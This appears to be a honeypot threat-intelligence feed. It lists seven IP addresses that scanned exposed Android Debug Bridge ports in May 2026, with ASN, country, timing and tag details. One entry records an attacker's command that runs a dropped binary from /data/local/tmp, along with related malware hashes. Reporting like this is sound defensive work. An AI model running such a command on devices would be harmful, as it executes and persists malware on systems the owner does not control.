IPv4	58.240.250.77	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-05. events=61 \| first_seen=2026-05-31T12:24:37.000Z \| last_seen=2026-05-31T12:37:33.319Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-31
IPv4	64.62.197.103	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-31T13:37:15.000Z \| last_seen=2026-05-31T13:38:17.123Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	118.141.62.197	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=HK; asn=9304; asn_org=HGC Global Communications Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-31T16:14:27.000Z \| last_seen=2026-05-31T16:24:38.052Z \| ports=5555 \| cc=HK \| asn=9304 \| org=HGC Global Communications Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	94.142.248.2	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=RU; asn=205784; asn_org=NV Telecom LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-31T16:31:43.000Z \| last_seen=2026-05-31T16:32:46.682Z \| ports=5555 \| cc=RU \| asn=205784 \| org=NV Telecom LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	92.246.90.35	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=210819; asn_org=Netversor GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-31T17:06:26.000Z \| last_seen=2026-05-31T17:08:08.682Z \| ports=5555 \| cc=DE \| asn=210819 \| org=Netversor GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	159.203.4.63	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-31T18:23:50.000Z \| last_seen=2026-05-31T18:34:26.263Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	86.54.24.215	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=LV; asn=208885; asn_org=Noyobzoda Faridduni Saidilhom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-31T21:29:38.000Z \| last_seen=2026-05-31T21:30:48.363Z \| ports=5555 \| cc=LV \| asn=208885 \| org=Noyobzoda Faridduni Saidilhom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31